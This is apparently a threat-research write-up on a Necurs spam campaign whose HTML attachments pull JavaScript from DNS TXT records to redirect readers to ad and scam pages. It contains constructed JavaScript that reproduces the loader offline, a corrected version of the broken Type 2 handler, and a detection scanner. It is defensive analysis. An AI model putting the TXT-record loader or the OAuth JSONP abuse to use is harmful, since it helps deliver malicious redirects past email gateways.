Recently we noticed the Necurs botnet launching a small spam campaign with an HTML redirector as an attachment. The HTML is crafted to perform a DNS query for the spammer’s domain, obtain the DNS TXT record and execute the data held in that record as JavaScript. This leads to redirection to unwanted advertisements and scam web pages. This is the first time we have seen this botnet use this technique.
The emails spammed by Necurs had a subject “Delivery <Number>”. The email body is obfuscated using Cyrillic characters.
The emails have a single attachment named “invoic-<random alphanumeric>.html”. There are two versions of the HTML: one renders the text “Loading…” and sends its query to Google Public DNS, while the other renders no text and uses JSONDNS to obtain the redirect. Both are analysed below.
Attachment Type 1: Using Google Public DNS
The HTML attachment has a meta tag and a script tag. The content of the meta tag holds JavaScript, which the script tag causes to run. The JavaScript performs a DNS query for the spammer’s domain and obtains its DNS TXT record, a record type intended for free-form, machine-readable text about the domain. The data field of the DNS answer is then executed as JavaScript.
The HTML “invoic-B2448B.html” shown in Figures 1 and 2 contains a script tag that abuses Google’s OAuth 2.0 token-revocation endpoint as a JSONP loader to execute the obfuscated JavaScript found inside the meta tag.
When the attachment is opened, the script tag loads hxxp://accounts[.]google[.]com/o/oauth2/revoke?callback=ccc(). The endpoint echoes the callback parameter into a JavaScript response, so the browser ends up calling the attachment’s own function “ccc” while the only external script source visible in the HTML is a Google domain. The function first performs a DNS query via Google Public DNS using the decoded URL held in var v and retrieves the domain’s DNS TXT record. It then executes entry 0xD of the parsed DNS TXT record response, which is the data entry.
In Figure 3, the data entry contains JavaScript that loads hxxp://www[.]21732bfg36abp[.]kellogglawassociatesp[.]com/30098.html via window.location.replace(). This chain of events ultimately redirects the browser to an unwanted advertisement web page.
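As an added illustration, not part of the original analysis and not the sample’s own code, the following JavaScript reproduces the Type 1 data flow offline: it parses a Google Public DNS style JSON answer for a TXT query, undoes the TXT character-string quoting, and runs the record text against a stand-in window object so the redirect target can be observed without a browser. The domain, the answer body and the landing URL are constructed. The real loader reaches the data field by position (the 0xD entry); here it is read by name.

```javascript
// Added example, not code from the Necurs attachment: reproduce the Type 1
// redirect chain offline. Domain, answer body and landing URL are constructed;
// the JSON layout follows Google Public DNS's JSON API
// (https://dns.google/resolve?name=<domain>&type=TXT).
const SPAMMER_DOMAIN = "txt.redirector.example";                  // constructed
const LANDING_URL = "http://ads.redirector.example/30098.html";   // constructed
const JS_PAYLOAD = `window.location.replace('${LANDING_URL}')`;  // what the TXT record carries

// Constructed answer. TXT data is returned as one or more double-quoted
// character strings; a record over 255 bytes arrives as several of them.
const RESOLVE_RESPONSE = JSON.stringify({
  Status: 0, TC: false, RD: true, RA: true, AD: false, CD: false,
  Question: [{ name: `${SPAMMER_DOMAIN}.`, type: 16 }],
  Answer: [{ name: `${SPAMMER_DOMAIN}.`, type: 16, TTL: 300, data: `"${JS_PAYLOAD}"` }],
});

// Pull every TXT payload out of a resolve answer and undo the RFC 1035
// character-string quoting, re-joining split strings. Returns [] when the
// lookup failed (Status != 0) or there is no Answer section.
function extractTxtPayloads(responseText) {
  const resp = JSON.parse(responseText);
  if (resp.Status !== 0 || !Array.isArray(resp.Answer)) return [];
  return resp.Answer
    .filter((rr) => rr.type === 16)
    .map((rr) => {
      let text = "";
      for (const m of rr.data.matchAll(/"((?:[^"\\]|\\.)*)"/g)) {
        text += m[1].replace(/\\(.)/g, "$1"); // drop the backslash escapes
      }
      return text;
    });
}

// Stand-in for the browser's window so the record text can run without a browser.
function makeStubWindow() {
  const win = { location: { href: "about:blank", replace(url) { win.location.href = url; } } };
  return win;
}

// Do what the attachment does: treat the TXT record as a program. Binding the
// stub as `window` makes the redirect observable instead of effective.
function followRedirector(responseText) {
  const win = makeStubWindow();
  for (const payload of extractTxtPayloads(responseText)) {
    new Function("window", payload)(win);
  }
  return win.location.href;
}

console.log(extractTxtPayloads(RESOLVE_RESPONSE)); // the JavaScript hidden in DNS
console.log(followRedirector(RESOLVE_RESPONSE));   // where the victim ends up
```

The quoting step matters in practice: Google’s API returns the TXT data wrapped in double quotes, and a long record arrives as several quoted chunks that have to be joined before the text is a valid JavaScript statement.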
Attachment Type 2: Using open-source JSONDNS
The other type of HTML attachment is simpler and smaller: it uses JSONDNS, an open-source service that answers DNS queries over HTTP and returns the result as JSON, wrapped in a JSONP callback when one is requested.
In Figure 4, the HTML attachment “invoic-9094.html” performs the DNS query directly from the script tag’s src URL; the service returns the DNS TXT record and passes it to the JavaScript function jsonp(json).
The content of the rdata entry is itself a window.location.replace() JavaScript statement, and executing it is the sole purpose of jsonp(json).
This sample does not work as intended, however. jsonp(json) passes the rdata value to window.location.replace() as if it were a URL rather than evaluating it, so window.location.replace() is effectively called twice: the outer call in the handler swallows the inner one in the record. The browser’s URL is replaced with the literal text of the rdata entry and the intended page is never displayed.
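To make that failure concrete, here is an added example, not the sample’s own code, of the Type 2 handler as described next to the version that would have worked. The landing URL and the reply object are constructed; only the field name rdata is taken from the sample, and the rest of the JSONDNS reply shape is assumed.

```javascript
// Added example, not code from the Necurs attachment: the Type 2 JSONP handler
// and why the analysed sample never reaches its landing page. LANDING_URL and the
// reply object are constructed; only the field name `rdata` comes from the sample.
const LANDING_URL = "http://ads.redirector.example/landing.html"; // constructed

// The TXT record text as a JSONP DNS service would hand it to the callback. In
// the campaign the record is itself a window.location.replace() statement.
const DNS_REPLY = { rdata: `window.location.replace('${LANDING_URL}')` }; // constructed

// Stand-in for the browser window: records what replace() was asked to load.
// A real browser parses a non-URL string as a path relative to the attachment's
// own location, so the navigation fails rather than redirects.
function makeStubWindow() {
  const win = { location: { href: "about:blank", replace(url) { win.location.href = url; } } };
  return win;
}

// The handler as shipped: rdata is handed to replace() as if it were a URL. The
// outer replace() in the handler swallows the inner one in the record, and the
// browser is told to load the literal text of that inner statement.
function jsonpAsShipped(json, win = makeStubWindow()) {
  win.location.replace(json.rdata);
  return win.location.href;
}

// What the operator presumably intended: run the record text as code, so the
// inner replace() fires with the real URL. Shown only to make the defect visible.
function jsonpEvaluated(json, win = makeStubWindow()) {
  new Function("window", json.rdata)(win);
  return win.location.href;
}

console.log(jsonpAsShipped(DNS_REPLY)); // window.location.replace('http://ads.redirector.example/landing.html')
console.log(jsonpEvaluated(DNS_REPLY)); // http://ads.redirector.example/landing.html
```

For a defender the broken version is still worth detecting: the attachment, the DNS lookup and the hidden URL are all present, and the one-line fix on the operator’s side is obvious.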
Conclusion
Necurs is still sending out spam campaigns from time to time, although the output from this botnet is now sporadic and small in volume. Though this campaign is low in volume, it is significant because it shows that the people behind this botnet are experimenting. They are now exploring DNS and have used the DNS TXT record to keep the malicious or unwanted URLs out of the attachment itself, where email gateway scanners would otherwise see them. They also tried the open-source JSONDNS, whose JSONP-style callback lets the response be loaded as a script from any origin, sidestepping the same-origin policy that would block a direct cross-domain XMLHttpRequest. Perhaps the operators are at an early stage of developing this type of spam campaign. The payload of many previous Necurs campaigns was malware, and it would not take much for the payload to switch from ‘harmless’ advertising to something more sinister.
While new to Necurs, the DNS TXT record strategy itself is not new. For example, the Carbanak campaign we observed in April 2017 also used DNS TXT records to retrieve and execute malware on the compromised system.
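The gateway-evasion point in the conclusion is the one defenders can act on directly. As an added example, again not code from this post or from any product, the following JavaScript scans the text of an HTML attachment for the structural signs of this redirector: a script tag that fetches a TXT record over HTTP, a JSONP callback parameter carrying call syntax such as callback=ccc(), JavaScript stored in a meta tag, dynamic evaluation, and location rewriting. The indicator list and weights are my own heuristics, and the three attachments it is run on are constructed, including the JSONDNS-style lookup URL.

```javascript
// Added example, not code from the post or any product: heuristic scan of an HTML
// attachment for the DNS-TXT redirector pattern. Indicator list and weights are
// assumptions; the sample attachments below are constructed.
const INDICATORS = [
  { id: "txt-record-fetch", weight: 3,
    re: /<script\b[^>]*\bsrc\s*=\s*["'][^"']*[?&]type=(?:txt|16)\b/i,
    note: "script tag loads a DNS TXT lookup over HTTP" },
  { id: "callback-with-call-syntax", weight: 3,
    re: /[?&]callback=[A-Za-z_$][\w$]*\(\)/,
    note: "JSONP callback parameter carries call syntax, e.g. callback=ccc(); the endpoint is used only to invoke local code" },
  { id: "meta-content-script", weight: 2,
    re: /<meta\b[^>]*\bcontent\s*=\s*["'][^"']*(?:function\s*\w*\s*\(|eval\(|fromCharCode|window\.location)/i,
    note: "meta tag content holds JavaScript" },
  { id: "dynamic-eval", weight: 1, re: /\b(?:eval|Function)\s*\(/,
    note: "dynamic code evaluation" },
  { id: "location-replace", weight: 1, re: /\blocation\.replace\s*\(/,
    note: "script rewrites the document location" },
];
const SUSPICIOUS_AT = 3; // assumption: one strong indicator or several weak ones

// Returns every indicator that fired plus a verdict. Pure text matching, no
// rendering, so it is safe to run on untrusted input at the gateway.
function scanAttachment(html) {
  const findings = INDICATORS.filter((ind) => ind.re.test(html))
    .map(({ id, weight, note }) => ({ id, weight, note }));
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  return { score, findings, suspicious: score >= SUSPICIOUS_AT };
}

// Constructed stand-ins for the two attachment types and a harmless invoice page.
const TYPE1_HTML = `<html><head>
<meta name="d" content="function ccc(){var v=String.fromCharCode(104,116,116,112);}">
<script>eval(document.querySelector('meta[name=d]').content)</script>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=ccc()"></script>
</head><body>Loading...</body></html>`;
const TYPE2_HTML = `<html><head>
<script>function jsonp(json){window.location.replace(json.rdata);}</script>
<script src="http://dns.jsonp.example/lookup?domain=spammer.example&type=TXT&callback=jsonp"></script>
</head><body></body></html>`;
const BENIGN_HTML = `<html><head>
<script src="https://cdn.example/widget.js?callback=onLoad"></script>
</head><body><p>Your invoice is attached as a PDF.</p></body></html>`;

for (const [name, html] of [["type1", TYPE1_HTML], ["type2", TYPE2_HTML], ["benign", BENIGN_HTML]]) {
  const r = scanAttachment(html);
  console.log(name, r.suspicious ? "SUSPICIOUS" : "clean", r.score, r.findings.map((f) => f.id).join(","));
}
```

The two strong indicators are deliberately independent of any particular DNS provider: the Type 1 sample trips on the callback=ccc() syntax even though its DNS lookup is hidden inside obfuscated code, while the Type 2 sample trips on the TXT lookup in the script src even though its callback name is an ordinary identifier.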
IOCs
invoic-B2448B.html MD5=78809ebe7b7439cb7b3377284e656258
invoic-9094.html MD5=02f16039651a529f1f7eceb53aecd126